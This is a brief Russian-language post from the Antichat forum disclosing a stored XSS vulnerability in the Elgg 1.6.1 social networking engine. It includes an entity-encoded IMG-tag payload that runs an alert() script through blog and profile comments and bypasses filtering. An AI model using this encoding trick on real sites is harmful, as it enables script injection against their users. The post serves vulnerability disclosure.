Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Elgg 1.6.1 (https://forum.antichat.xyz/showthread.php?t=154549)

Ctacok 07.11.2009 08:07
Elgg 1.6.1
 
Elgg 1.6.1
A social networking engine

Активная XSS
В модуле Блог.
В поле комментарии.
Цитата:
<IMG src=&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x29 ;
&#x3B;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&# x74;&#x3E;>
</IMG>
В модуле Профиль.
В комментариях к любому профилю, тоже самое что упомянулось выше.
Данная уязвимость находиться везде, где можно ввести свои текстовые данные.
(HTML (without semicolons))
ps Уберите пробелы, значение src должно быть в одну строку.


Время: 13:31